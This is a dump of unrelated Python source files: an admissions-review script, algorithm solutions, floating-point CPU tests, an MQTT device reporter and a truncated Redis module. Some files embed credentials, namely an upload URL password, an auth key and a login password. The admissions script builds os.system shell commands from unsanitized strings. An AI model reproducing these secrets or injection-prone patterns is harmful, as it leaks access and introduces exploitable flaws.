Fails prefilter\",\n 'y' : \"NCS-Pass: not enough CS but stellar enough to pass prefilter\",\n 'z' : \"NCS-Star: not enough CS.. yet stellar\",\n 'S' : \"SKIP setting Prefilter_Status\",\n 'Q' : \"Quit without saving (remove temp files)\"\n }\n #order to display menu items in \n response_code_list = ['r', 's','v','g','u','x','y','z','S','Q']\n\n #map responses to gradapps prefilter status column values\n gradapps_response_map = { 's' : \"Pass-Star\",\n 'v' : \"Pass-VGE\",\n 'g' : \"Pass-G\",\n 'u' : \"Unsure\",\n 'r' : \"Reject\",\n 'x' : \"NCS-Reject\",\n 'y' : \"NCS-Pass\",\n 'z' : \"NCS-Star\",\n }\n \n import uuid #universal unique resource naming thingy\n s = str(uuid.uuid4())\n OFN_basename = \"dcs-prefilter-\" + s + \".csv\"\n OFN = os.path.join(OFN_DIR,OFN_basename)\n BFN_basename = \"dcs-app-status-\"+ s + \".csv\"\n BFN = os.path.join(OFN_DIR,BFN_basename)\n if os.path.exists(BFN):\n die(\"Sorry, \" + BFN_basename + \" file already exists\")\n\n assert not os.path.exists(OFN)\n write_to_new_file(\"testwrite\",OFN,{}) #test write junk to OFN to make sure have perms and all that\n write_to_new_file(\"testwrite\",BFN,{}) #test write junk to OFN to make sure have perms and all that\n\n #########\n # main loop asking for decisions and writing them (paranoidly) away\n #########\n decisions = {}\n dcs_status_map = {}\n dcs_status_map_ix = 0\n #TODO: use Enumerate to eliminate dcs_status_map_ix \n for app_num in app_num_list:\n #concoct path of app_num \"papers\"\n # file-NNN-1.pdf is transcript\n sop_fn = pdf_file_no_for_app(app_num,1)\n cv_fn = pdf_file_no_for_app(app_num,2)\n transcript_fn = pdf_file_no_for_app(app_num,3)\n print(os.path.basename(sop_fn),os.path.basename(cv_fn),os.path.basename(transcript_fn))\n print('user_ref=$(cat /tmp/user_ref) && open \"https://confs.precisionconference.com/~mscac20/submissionProfile?paperNumber=' + app_num +'&userRef=$user_ref\"')\n \n def show_prefilter_menu(app_num):\n \"\"\"first attempt at refactoring to fix nasty control flow.\n returns true if should continue filtering, false if should bail to rsync\"\"\"\n #TODO: factor this guy out of the outer loop. how to cleanly handle all the closed over vars?\n resp = \"\"\n while True:\n os.system(VIEWER + \" \" + sop_fn + \" \" + cv_fn + \" \" + transcript_fn)\n profile_data = app_num_to_profile_data[app_num]\n\n ########## print a condensed \"info panel\" about the applicant.\n print(prefilter_info_panel( app_num, profile_data,dcs_status_map_ix, len(app_num_list)),end='')\n\n prompt = \"%s enter letter for prefilter_status decision > \" % (\n prefilter_prompt(int(app_num), profile_data, dcs_status_map_ix, len(app_num_list)) )\n\n menu = PrefilterMenu(response_code_list, menu_line_dict , prompt)\n\n #########\n # menu reading decision TODO: refactor into separate function\n #########\n resp = menu.menu()\n if resp == None:\n print(\"\\n\\nwonky reponse (interrupt key pressed?) from menu\",resp)\n continue\n\n\n if resp.startswith('S'):\n print(\"okay, skipping\", app_num)\n return True ######### goto next application (or once did)\n\n if resp.startswith('Q'):\n print(\"really quit, eh?. Nothing will be saved. dregs will be removed..\")\n ## print(\"decisions left on local machine in\",OFN)\n ## print(\"prefilter left on local machine in\",BFN)\n os.system( \"rm %s %s\" % (OFN, BFN) )\n return False\n\n #paste to clipboard\n os.system(\"/bin/echo -n '%s' | pbcopy\" % prefilter_info_panel( app_num, profile_data,dcs_status_map_ix, len(app_num_list)))\n\n gradapps_response = gradapps_response_map[resp]\n\n if gradapps_response == None:\n print(\"gotta choose something here. looping back to same application\")\n continue\n\n try:\n decisions[profile_data[GradAppsField.SGS_NUM]] = gradapps_response\n #TODO: fix this searching through string value for state\n if re.search(\"Reject\", gradapps_response):\n print(\"skip adding\", app_num, \"to dcs_status_map because rejected\")\n else:\n dcs_status_map[profile_data[GradAppsField.SGS_NUM]] = prefilter_status_field(profile_data)\n write_to_new_file(\"dcs app status\",BFN, dcs_status_map)\n\n ########## paranoidly, write every time\n # megaparanoid would be to copy file each time to tmp\n write_to_new_file(uni_filter_regexp,OFN, decisions)\n #put this in clipboard, since i want to email it to people so often\n\n #could fire up email here for stars ?\n print(\"open -a Firefox.app 'mailto:sam@cs.toronto.edu,arvind@cs.toronto.edu?subject=star %s?cc=clair@cs.toronto.edu'\" % 42)\n return True\n except Exception as e:\n #input(\"hello2\")\n print(e)\n import traceback\n traceback.print_exc(file=sys.stderr)\n print(OFN, \"something when wrong writing.. please try enter\", resp,\"again\")\n print(\"\"\"Note: if you get stuck looping in here only way out is to control-z and kill this job\"\"\")\n resp = \"\"\n continue\n \n dcs_status_map_ix += 1\n\n if not show_prefilter_menu(app_num):\n exit(0)\n \n\n if len(decisions) == 0:\n print(\"you skipped all applicants. no decisions made. exiting..\")\n exit(0)\n\n pretty_print_app_list(app_num_to_profile_data,app_num_list,sys.stdout,decisions)\n\n #########\n # rest of script largely for sending decisions back to gradapps\n #########\n print(\"\\n=========================\")\n os.system(\"ls -l \" + OFN)\n os.system(\"cat \" + OFN)\n print(\"=========================\\n\")\n print(\"\"\"next import these prefilter decisions into the gradapps system:\n 1. copy/rsync files to apps1 \n 2. run curl commands to gradapps server to update dcs application status and prefilter status columns\"\"\")\n \n dest = \"%s:%s/\" % (CSLAB_USERID, MSCAC_PREFILTER_DIR_NAME)\n rsync_cmd = \"rsync %s %s %s\" % (OFN, BFN, dest)\n\n #magic URL's configured into gradapps to upload data into fields\n URL_TEMPL='https://confs.precisionconference.com/~mscac20/uploadApps?config=%s&pass=StayorGo'\n CURL_TEMPL = 'curl -F appsFile=\"@mscac-prefilter/%s\" \"%s\"'\n curl_cmd = CURL_TEMPL % ( OFN_basename, URL_TEMPL % \"prefilter\" )\n curl_dcsstatus_cmd = CURL_TEMPL % ( BFN_basename, URL_TEMPL % \"dcsstatus\" )\n\n # probably will need ssh config support or will prompt for password\n\n print(OFN,BFN)\n resp = input(\"hit Enter rsync to %s > \" % CSLAB_USERID)\n if resp.startswith('s'):\n os.system(\"ls -l %s %s\" % (OFN,BFN))\n die(\"prefilter decisions not uploaded to gradapps\")\n\n os.system(rsync_cmd)\n print(\"ls -ltr | tail -2 to see if rsync'd files made it..\")\n os.system(\"ssh %s ls -ltr %s/ | tail -2\" % (CSLAB_USERID, MSCAC_PREFILTER_DIR_NAME))\n\n ssh_cmd = \"ssh -tt %s '%s'\" % (CSLAB_USERID, curl_cmd )\n ssh_dcsstatus_cmd = \"ssh -tt %s '%s'\" % (CSLAB_USERID, curl_dcsstatus_cmd)\n\n os.system(ssh_cmd)\n os.system(ssh_dcsstatus_cmd)\n\n with open(\"log\",\"a\") as a_file_whatsit:\n import datetime\n print(datetime.datetime.now(),file=a_file_whatsit)\n pretty_print_app_list(app_num_to_profile_data,app_num_list,a_file_whatsit,decisions)\n print(\"==================================\", file=a_file_whatsit)\n\n","sub_path":"eat.py","file_name":"eat.py","file_ext":"py","file_size_in_byte":34628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"633397228","text":"#!/usr/bin/env python\n# coding=utf-8\n#\n# Author: Lucas\n# Date: 2019-07-28 16:38:11\n\n\nclass Solution(object):\n def circularArrayLoop(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n visited = [False] * len(nums)\n for i in range(len(nums)):\n if visited[i]:\n continue\n current = set()\n index = i\n direction = nums[i] > 0\n while True:\n if index in current:\n loops = set()\n while index not in loops:\n loops.add(index)\n index = (index + nums[index]) % len(nums)\n tmp = [nums[j] > 0 for j in loops]\n if False in tmp and True in tmp:\n break\n return True\n elif visited[index]:\n break\n current.add(index)\n visited[index] = True\n tmp = (index + nums[index]) % len(nums)\n if tmp == index:\n break\n index = tmp\n return False\n\n\n# Test\nimport unittest\n\n\nclass TestSolution(unittest.TestCase):\n def test_case_1(self):\n nums = [2, -1, 1, 2, 2]\n self.assertTrue(\n Solution().circularArrayLoop(nums)\n )\n\n def test_case_2(self):\n nums = [-1, 2]\n self.assertFalse(\n Solution().circularArrayLoop(nums)\n )\n\n def test_case_3(self):\n nums = [1, -1]\n self.assertFalse(\n Solution().circularArrayLoop(nums)\n )\n\n def test_case_4(self):\n nums = [-1,2,1,2]\n self.assertTrue(\n Solution().circularArrayLoop(nums)\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"401-500/457_CircularArrayLoop/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"460219662","text":"# \n# Copyright 2011-2012 Jeff Bush\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# \n\nfrom testgroup import *\nfrom types import *\nimport struct\n\nclass FloatingPointTests(TestGroup):\n\tdef test_floatingPointAddition():\n\t\ttestValues = [\n\t\t\t(17.79, 19.32, 37.11), # Exponents are equal\n\t\t\t(0.34, 44.23, 0x423247ad), # Exponent 2 larger (44.57, adjusted for truncated rounding)\n\t\t\t(44.23, 0.034, 0x42310e55), # Exponent 1 larger\n\t\t\t(-1.0, 5.0, 4.0), # First element is negative and has smaller exponent\n\t\t\t(-5.0, 1.0, -4.0), # First element is negative and has larger exponent\t\t\n\t\t\t(5.0, -1.0, 4.0), # Second element is negative and has smaller exponent\n\t\t\t(1.0, -5.0, -4.0), # Second element is negative and has larger exponent\n\t\t\t(5.0, 0.0, 5.0), # Zero identity (zero is a special case in IEEE754)\n\t\t\t(0.0, 5.0, 5.0),\n\t\t\t(0.0, 0.0, 0.0),\n\t\t\t(7.0, -7.0, 0.0), # Result is zero\n\t\t\t(1000000.0, 0.0000001, 1000000.0), # Second op is lost because of precision\n\t\t\t(0.0000001, 0.00000001, 0x33ec3923), # Very small number \n\t\t\t(1000000.0, 10000000.0, 11000000.0),\t# Very large number\n\t\t\t(-0.0, 2.323, 2.323),\t# negative zero\n\t\t\t(2.323, -0.0, 2.323)\t# negative zero\n\t\t]\n\n\t\tcases = []\n\t\n\t\tregIndex = 0\n\t\tinRegs = {}\n\t\toutRegs = {}\n\t\tcode = ''\n\t\tfor value1, value2, expectedResult in testValues:\n\t\t\toutRegs['t0s' + str(regIndex)] = expectedResult\n\t\t\tinRegs['s' + str(regIndex + 1)] = value1\n\t\t\tinRegs['s' + str(regIndex + 2)] = value2\n\t\t\tcode += 'add_f s'+ str(regIndex) + ', s' + str(regIndex + 1) + ', s' + str(regIndex + 2) + '\\n'\n\t\t\tregIndex += 3\n\t\t\t\n\t\t\tif regIndex == 27:\n\t\t\t\tcases += [ (inRegs, code, outRegs, None, None, None) ]\n\t\t\t\tinRegs = {}\n\t\t\t\toutRegs = {}\n\t\t\t\tcode = ''\n\t\t\t\tregIndex = 0\n\t\n\t\tif regIndex > 0:\n\t\t\tcases += [ (inRegs, code, outRegs, None, None, None) ]\n\t\t\tinRegs = {}\n\t\t\toutRegs = {}\n\t\t\tcode = ''\n\n\t\treturn cases\n\t\n\tdef test_floatingPointScalarCompare():\n\t\ttestValues = [\n\t\t\t(-2.0, 'gt', -3.0, 1),\n\t\t\t(-3.0, 'gt', -2.0, 0),\n\t\t\t(17.0, 'gt', 2.0, 1),\n\t\t\t(2.0, 'gt', 17.0, 0),\n\t\t\t(5.0, 'gt', -17.0, 1),\n\t\t\t(-17.0, 'gt', 5.0, 0),\n\t\t\t(15.0, 'gt', -7.0, 1),\n\t\t\t(-7.0, 'gt', 15.0, 0),\n\t\t\t(-2.0, 'ge', -3.0, 1),\n\t\t\t(-3.0, 'ge', -2.0, 0),\n\t\t\t(17.0, 'ge', 2.0, 1),\n\t\t\t(2.0, 'ge', 17.0, 0),\n\t\t\t(5.0, 'ge', -17.0, 1),\n\t\t\t(-17.0, 'ge', 5.0, 0),\n\t\t\t(15.0, 'ge', -7.0, 1),\n\t\t\t(-7.0, 'ge', 15.0, 0),\n\t\t\t(-5.0, 'ge', -5.0, 1),\n\t\t\t(-2.0, 'lt', -3.0, 0),\n\t\t\t(-3.0, 'lt', -2.0, 1),\n\t\t\t(17.0, 'lt', 2.0, 0),\n\t\t\t(2.0, 'lt', 17.0, 1),\n\t\t\t(5.0, 'lt', -17.0, 0),\n\t\t\t(-17.0, 'lt', 5.0, 1),\n\t\t\t(15.0, 'lt', -7.0, 0),\n\t\t\t(-7.0, 'lt', 15.0, 1),\n\t\t\t(-2.0, 'le', -3.0, 0),\n\t\t\t(-3.0, 'le', -2.0, 1),\n\t\t\t(17.0, 'le', 2.0, 0),\n\t\t\t(2.0, 'le', 17.0, 1),\n\t\t\t(5.0, 'le', -17.0, 0),\n\t\t\t(-17.0, 'le', 5.0, 1),\n\t\t\t(15.0, 'le', -7.0, 0),\n\t\t\t(-7.0, 'le', 15.0, 1),\n\t\t\t(-5.0, 'le', -5.0, 1),\n\t\t\t(float('nan'), 'le', 5.0, 0),\n\t\t\t(5.0, 'le', float('nan'), 0),\n\t\t]\n\t\n\t\tcases = []\n\t\tregIndex = 0\n\t\tinRegs = {}\n\t\toutRegs = {}\n\t\tcode = ''\n\t\tfor value1, operator, value2, expectedResult in testValues:\n\t\t\toutRegs['t0s' + str(regIndex)] = 0xffff if expectedResult else 0\n\t\t\tinRegs['s' + str(regIndex + 1)] = value1\n\t\t\tinRegs['s' + str(regIndex + 2)] = value2\n\t\t\tcode += 'set' + operator + '_f s' + str(regIndex) + ', s' + str(regIndex + 1) + ', s' + str(regIndex + 2) + '\\n'\n\t\t\tregIndex += 3\n\t\t\t\n\t\t\tif regIndex == 27:\n\t\t\t\tcases += [ (inRegs, code, outRegs, None, None, None) ]\n\t\t\t\tinRegs = {}\n\t\t\t\toutRegs = {}\n\t\t\t\tcode = ''\n\t\t\t\tregIndex = 0\n\t\n\t\tif regIndex > 0:\n\t\t\tcases += [ (inRegs, code, outRegs, None, None, None) ]\n\t\t\tinRegs = {}\n\t\t\toutRegs = {}\n\t\t\tcode = ''\n\t\t\t\n\t\treturn cases\n\t\n\tdef test_floatingPointVectorCompare():\n\t\tvec1 = [ (random.random() - 0.5) * 10 for x in range(16) ]\n\t\tvec2 = [ (random.random() - 0.5) * 10 for x in range(16) ]\n\t\t\n\t\tgreaterMask = 0\n\t\tlessMask = 0\n\t\tgreaterEqualMask = 0\n\t\tlessEqualMask = 0\n\t\tfor x in range(16):\n\t\t\tgreaterMask |= (0x8000 >> x) if vec1[x] > vec2[x] else 0\n\t\t\tlessMask |= (0x8000 >> x) if vec1[x] < vec2[x] else 0\n\t\t\tgreaterEqualMask |= (0x8000 >> x) if vec1[x] >= vec2[x] else 0\n\t\t\tlessEqualMask |= (0x8000 >> x) if vec1[x] <= vec2[x] else 0\n\t\n\t\treturn ({ \t'v0' : [ x for x in vec1 ],\n\t\t\t\t\t'v1' : [ x for x in vec2 ] },\n\t\t\t'''\n\t\t\t\tsetgt_f s2, v0, v1 \n\t\t\t\tsetlt_f s3, v0, v1\n\t\t\t\tsetge_f s4, v0, v1\n\t\t\t\tsetle_f s5, v0, v1\n\t\t\t''',\n\t\t\t{ \t't0s2' : greaterMask, \n\t\t\t\t't0s3' : lessMask,\t \n\t\t\t\t't0s4' : greaterEqualMask,\t\n\t\t\t\t't0s5' : lessEqualMask }, None, None, None)\t\n\t\t\t\t\n\tdef test_floatingPointRAWDependency():\n\t\treturn ({ 's1' : 7.0, 's2' : 11.0, 's4' : 13.0 }, '''\n\t\t\tadd_f s0, s1, s2\n\t\t\tadd_f s3, s0, s4\n\t\t''', { 't0s0' : 18.0, 't0s3' : 31.0 }, None, None, None)\n\n\tdef test_infAndNanAddition():\n\t\tPOS_INF = float('inf')\n\t\tNEG_INF = -float('inf')\n\t\tNAN = float('nan')\n\n\t\treturn ({ 's1' : POS_INF, 's2' : NEG_INF, 's3' : NAN, 's4' : 3.14 }, '''\n\t\t\tadd_f s5, s1, s1\n\t\t\tadd_f s6, s1, s2\n\t\t\tadd_f s7, s2, s2\n\t\t\tadd_f s8, s2, s1\n\t\t\t\n\t\t\tsub_f s9, s1, s1\n\t\t\tsub_f s10, s1, s2\n\t\t\tsub_f s11, s2, s2\n\t\t\tsub_f s12, s2, s1\n\n\t\t\tadd_f s13, s4, s1\n\t\t\tadd_f s14, s4, s2\n\t\t\tadd_f s15, s4, s3\n\n\t\t\tadd_f s16, s1, s4 \n\t\t\tadd_f s17, s2, s4\n\t\t\tadd_f s18, s3, s4\n\n\t\t\tsub_f s19, s4, s1\n\t\t\tsub_f s20, s4, s2\n\t\t\tsub_f s21, s4, s3\n\n\t\t\tsub_f s22, s1, s4 \n\t\t\tsub_f s23, s2, s4\n\t\t\tsub_f s24, s3, s4\n\t\t''', { \n\t\t\t't0s5' : POS_INF + POS_INF,\n\t\t\t't0s6' : POS_INF + NEG_INF,\n\t\t\t't0s7' : NEG_INF + NEG_INF,\n\t\t\t't0s8' : NEG_INF + POS_INF,\n\n\t\t\t't0s9' : POS_INF - POS_INF,\n\t\t\t't0s10' : POS_INF - NEG_INF,\n\t\t\t't0s11' : NEG_INF - NEG_INF,\n\t\t\t't0s12' : NEG_INF - POS_INF,\n\n\t\t\t't0s13' : 3.14 + POS_INF,\n\t\t\t't0s14' : 3.14 + NEG_INF,\n\t\t\t't0s15' : 3.14 + NAN,\n\n\t\t\t't0s16' : POS_INF + 3.14,\n\t\t\t't0s17' : NEG_INF + 3.14,\n\t\t\t't0s18' : NAN + 3.14,\n\n\t\t\t't0s19' : 3.14 - POS_INF,\n\t\t\t't0s20' : 3.14 - NEG_INF,\n\t\t\t't0s21' : 3.14 - NAN,\n\n\t\t\t't0s22' : POS_INF - 3.14,\n\t\t\t't0s23' : NEG_INF - 3.14,\n\t\t\t't0s24' : NAN - 3.14\n\t\t}, None, None, None)\n\t\t\n\tdef test_infAndNanMultiplication():\n\t\tPOS_INF = float('inf')\n\t\tNEG_INF = -float('inf')\n\t\tNAN = float('nan')\n\n\t\treturn ({ 's1' : POS_INF, 's2' : NEG_INF, 's3' : NAN, 's4' : 1.0 }, '''\n\t\t\tmul_f s5, s1, s1\n\t\t\tmul_f s6, s1, s2\n\t\t\tmul_f s7, s2, s2\n\t\t\tmul_f s8, s2, s1\n\t\t\t\n\t\t\tmul_f s9, s4, s1\n\t\t\tmul_f s10, s4, s2\n\t\t\tmul_f s11, s4, s3\n\n\t\t\tmul_f s12, s1, s4 \n\t\t\tmul_f s13, s2, s4\n\t\t\tmul_f s14, s3, s4\n\t\t''', { \n\t\t\t't0s5' : POS_INF * POS_INF,\n\t\t\t't0s6' : POS_INF * NEG_INF,\n\t\t\t't0s7' : NEG_INF * NEG_INF,\n\t\t\t't0s8' : NEG_INF * POS_INF,\n\n\t\t\t't0s9' : 1.0 * POS_INF,\n\t\t\t't0s10' : 1.0 * NEG_INF,\n\t\t\t't0s11' : 1.0 - NAN,\n\n\t\t\t't0s12' : POS_INF * 1.0,\n\t\t\t't0s13' : NEG_INF * 1.0,\n\t\t\t't0s14' : NAN * 1.0,\n\t\t}, None, None, None)\t\t\n\t\t\n\t\t\n\tdef test_floatingPointMultiplication():\n\t\treturn ({ 's1' : 2.0, \n\t\t\t's2' : 4.0, \n\t\t\t's5' : 27.3943, \n\t\t\t's6' : 99.382,\n\t\t\t's8' : -3.1415,\n\t\t\t's9' : 2.71828,\n\t\t\t's11' : -1.2,\n\t\t\t's12' : -2.3,\n\t\t\t's14' : 4.0,\n\t\t\t's15' : 0.001,\n\t\t\t's17'\t: 0.0,\n\t\t\t's18'\t: 19.4\n\t\t\t}, '''\n\t\t\tmul_f s3, s1, s2\n\t\t\tmul_f s4, s5, s6\n\t\t\tmul_f s7, s8, s9\n\t\t\tmul_f s10, s11, s12\n\t\t\tmul_f s13, s14, s15\n\t\t\tmul_f s16, s17, s18\t\t; zero identity\n\t\t\tmul_f s19, s18, s17\t\t; zero identity (zero in second position)\n\t\t''', { \n\t\t\t't0s3' : 8.0, \n\t\t\t't0s4' : 2722.5003226,\n\t\t\t't0s7' : -8.53947662,\n\t\t\t't0s10' : 2.76,\n\t\t\t't0s13' : 0.004,\n\t\t\t't0s16' : 0.0,\n\t\t\t't0s19' : 0.0\n\t\t}, None, None, None)\n\t\t\n\tdef test_itof():\n\t\treturn ({ 's1' : 12, \n\t\t\t\t's5' : -123, \n\t\t\t\t's7' : 23 },\n\t\t\t'''\n\t\t\t\titof s3, s1\t\n\t\t\t\titof s4, s5\n\t\t\t\titof s6, s7\n\t\t\t''',\n\t\t\t{ \t't0s3' : 12.0,\n\t\t\t \t't0s4' : -123.0,\n\t\t\t \t't0s6' : 23.0\n\t\t\t}, None, None, None)\n\n\tdef test_ftoi1():\n\t\treturn ({ 's1' : 12.981, \n\t\t\t\t's5' : -123.0, \n\t\t\t\t's7' : 23.0 },\n\t\t\t'''\n\t\t\t\tftoi s3, s1\t\n\t\t\t\tftoi s4, s5\n\t\t\t\tftoi s6, s7\n\t\t\t''',\n\t\t\t{ 't0s3' : 12,\n\t\t\t \t't0s4' : -123,\n\t\t\t \t't0s6' : 23\n\t\t\t}, None, None, None)\n\t\n\tdef test_ftoi2():\n\t\treturn ({ 's1': 0.00009, 's2' : 0.0 },\n\t\t'''\n\t\t\tftoi s4, s1\t; Result will be zero because of very small exponent. \n\t\t\t\t\t\t\t; Make sure we shift in zeros properly (regression test).\n\n\t\t\tftoi s5, s2\t; Actually zero\n\t\t''', { 't0s4' : 0, 't0s5' : 0, 't0s6' : 0 }, None, None, None)\n\n\tdef test_reciprocal1():\n\t\treturn ({ \n\t\t\t's0' : 12345.0, \n\t\t\t's1' : 4.0,\n\t\t\t's2' : +0.0,\n\t\t\t's3' : -0.0,\n\t\t\t's4' : float('inf'),\n\t\t\t's5' : -float('inf'),\n\t\t\t's6' : float('nan')\n\t\t}, '''\n\t\t\treciprocal s8, s0\t\t; divide by normal number\n\t\t\treciprocal s9, s1\t\t; significand is zero, special case\n\t\t\treciprocal s10, s2\t; divide by plus zero, +inf\n\t\t\treciprocal s11, s3\t; divide by minus zero, -inf\n\t\t\treciprocal s12, s4\t; divide by +inf, result is +0\n\t\t\treciprocal s13, s5\t; divide by -inf, result is -0\n\t\t\treciprocal s14, s6\t; divide by NaN, result is NaN\n\t\t''', { \n\t\t\t't0s8' : 0x38aa0000, \n\t\t\t't0s9' : 0.25, \n\t\t\t't0s10' : float('inf'),\n\t\t\t't0s11' : -float('inf'),\n\t\t\t't0s12' : +0.0,\n\t\t\t't0s13' : -0.0,\n\t\t\t't0s14' : float('nan')\n\t\t }, None, None, None)\n\t\n\tdef test_reciprocal2():\n\t\treturn ({ 's0' : 123.0, 's1' : 2.0 }, '''\n\t\t\treciprocal s2, s0\n\n\t\t\t; newton raphson refinement\n\t\t\tmul_f s3, s2, s0\t\t; Multiply x by est. of 1/x (ideally should be 1.0)\n\t\t\tsub_f s3, s1, s3\t\t; 2.0 - estimate returns the error\n\t\t\tmul_f s2, s3, s2\t\t; update estimate\n\n\t\t\tmul_f s3, s2, s0\t\t; One more iteration\n\t\t\tsub_f s3, s1, s3\n\t\t\tmul_f s2, s3, s2\n\t\t\n\t\t''', { 't0s2' : 0x3c053407, 't0s3' : None }, None, None, None )\n\t\t\t\n\tdef test_mulOverUnderflow():\n\t\treturn ({ 's1' : float('1e20'), 's2' : float('1e-20') },\n\t\t\t'''\n\t\t\t\tmul_f s3, s1, s1\t; overflow\n\t\t\t\tmul_f s4, s2, s2\t; underflow\n\t\t\t''',\n\t\t\t{ \t\n\t\t\t\t't0s3' : float('inf'),\n\t\t\t\t't0s4' : 0.0\n\t\t\t}, None, None, None)\n\t\t\t\n","sub_path":"tests/directed_verification/fp_test.py","file_name":"fp_test.py","file_ext":"py","file_size_in_byte":9897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"129163349","text":"from math import *\r\nimport time\r\n\r\ns = time.time()\r\n'''\r\ndef is_prime(number):\r\n if number == 2:\r\n return True\r\n else:\r\n sqrt_nr = ceil(sqrt(number))\r\n i = 2;\r\n while i <= sqrt_nr:\r\n if not(number % i):\r\n return False\r\n i = incr(i)\r\n return True\r\n\r\ndef incr(i):\r\n if i <= 2:\r\n return i + 1\r\n elif i > 5 and i % 6 == 1:\r\n return i + 4\r\n else:\r\n return i + 2\r\n\r\ndef find_next_prime(prime):\r\n prime = incr(prime)\r\n while not is_prime(prime):\r\n prime = incr(prime)\r\n return prime\r\n\r\n#prime_list = [is_prime(i) for i in range(30)]\r\n#print (prime_list)\r\n\r\n\r\n\r\ni=2\r\nprime=3;\r\nsum = 5\r\nwhile prime < 2000000:\r\n prime = find_next_prime(prime)\r\n sum += prime\r\n i = i + 1\r\nprint (prime)\r\nprint (time.time() -s)\r\n\r\n# project euler 10 - sum of primes\r\n\r\nsum = 2\r\nprime = 3\r\nwhile prime < 500000:\r\n sum += prime\r\n prime = find_next_prime(prime)\r\nprint (sum)\r\nprint (time.time() -s)\r\n'''\r\n#### A faster solution?? - uses a sieve method\r\n\r\nmarked = [0] * 1000000\r\nvalue = 3\r\ns = 2\r\nwhile value < 1000000:\r\n if marked[value] == 0:\r\n s += value\r\n i = value\r\n while i < 1000000:\r\n marked[i] = 1\r\n i += value\r\n value += 2\r\nprint (s)\r\n\r\n","sub_path":"old_solutions/primefinder.py","file_name":"primefinder.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"307271700","text":"import sys\n\nwith open(sys.argv[1], 'r') as f:\n\tfor line in f:\n\t\tline = line.strip()\n\t\tif line[0] == '#':\n\t\t\tprint(line)\n\t\telse:\n\t\t\tdata = line.split('\\t')\n\t\t\tdata[1] = str(int(sys.argv[2]) + int(data[1]))\n\t\t\tprint('\\t'.join(data))\n","sub_path":"coordinate_conversion.py","file_name":"coordinate_conversion.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"432843284","text":"# 样本,不是必要包\nimport time,hashlib\nimport paho.mqtt.client as mqtt\nfrom Activemq.getbrokerfordevice import getBrokerForDevice\nimport constant.site as site\nclass ReportStatus():\n def __init__(self,SN='C201170803IXMDQIJD',auth_key='015c6f4b1af4ef39a7a4ab30ff4c31d4'):\n self.SN = SN\n src = SN + \"1\" + \"2\" + auth_key\n m2 = hashlib.md5()\n m2.update(src.encode(\"utf-8\"))\n self.pwd = \"1_\" + \"2_\" + m2.hexdigest()\n self.message = ''\n self.hostname = getBrokerForDevice()\n def ReportNetworkStatus(self,func,*args,**kwargs):\n '''上报设备联��,连接设备之后,设置定时充电'''\n def on_connect(client, userdata, flags, rc):\n #print(\"Connected with result code \" + str(rc))\n client.subscribe(\"cmf/\" + self.SN, 1)\n client.publish(\"VirtualTopic/dmf/\" + self.SN,\"ReportNetworkStatus v1.0 996945745882812416\\n{\\\"online\\\":true}\")\n time.sleep(1)\n def on_message(client, userdata, msg):\n print(msg.topic + \" \" + str(msg.payload))\n def on_pushlish(client, userdata, mid):\n # print(\"send message success\" + str(mid))\n pass\n client = mqtt.Client(self.SN)\n client.username_pw_set(self.SN, self.pwd)\n client.on_publish = on_pushlish\n client.on_connect = on_connect\n client.on_message = on_message\n client.connect(self.hostname, 61613, 60)\n client.loop_start()\n time.sleep(1)\n client.loop_stop()\n return func(*args,**kwargs)\n\nif __name__ == \"__main__\":\n from Xcharger.SiteDetails.device_config import DeviceConfiguration\n import requests\n s = requests.session()\n dcf = DeviceConfiguration(s)\n dcf.login('zhichong','xcharger88')\n report = ReportStatus()\n devicelist = [{\"id\": \"918846221735563264\", \"port\": \"1\"}]\n Ctime23 = [\n {\n 'startTime': '23:30',\n 'power': ''\n }\n ]\n res = report.ReportNetworkStatus(dcf.ChargeringTime,devicelist,Ctime23)\n print(res.json())","sub_path":"Activemq/ReportNetworkStatus.py","file_name":"ReportNetworkStatus.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"203777802","text":"# coding=utf-8\nimport time\nimport json\nfrom redis_model.redis_client import *\n\n\nclass RoomRedis(object):\n\n __KEY_PREFIX__ = \"room_\"\n\n __KEY_USER_ID__ = \"user_id\"\n __KEY_JOIN_ID__ = \"join_id\"\n __KEY_START_TIME__ = \"start_time\"\n __KEY_BILL_TIME__ = \"bill_time\"\n @classmethod\n def create_room_record(cls, room_id, user_id, join_id):\n dic = {}\n dic[cls.__KEY_START_TIME__] = int(time.time())\n dic[cls.__KEY_USER_ID__] = user_id\n dic[cls.__KEY_JOIN_ID__] = join_id\n RQueueClient.getInstance().redis.set(cls.__KEY_PREFIX__ + room_id, json.dumps(dic), nx=True)\n\n @classmethod\n def get_room_record(cls, room_id):\n room_record = RQueueClient.getInstance().redis.get(cls.__KEY_PREFIX__ + room_id)\n return json.loads(room_record)\n\n\n @classmethod\n def room_paybill(cls, room_id):\n room_record = RQueueClient.getInstance().redis.get(cls.__KEY_PREFIX__ + room_id)\n room_dic = json.loads(room_record)\n bill_time = room_dic.get(cls.__KEY_BILL_TIME__)\n if bill_time:\n room_dic[cls.__KEY_BILL_TIME__] = int(time.time())\n total_seconds = int(time.time()) - bill_time\n RQueueClient.getInstance().redis.set(cls.__KEY_PREFIX__ + room_id, json.dumps(room_dic), xx=True)\n if total_seconds >= 55:\n return (total_seconds + 5) / 60\n else:\n return 0\n else:\n room_dic[cls.__KEY_BILL_TIME__] = 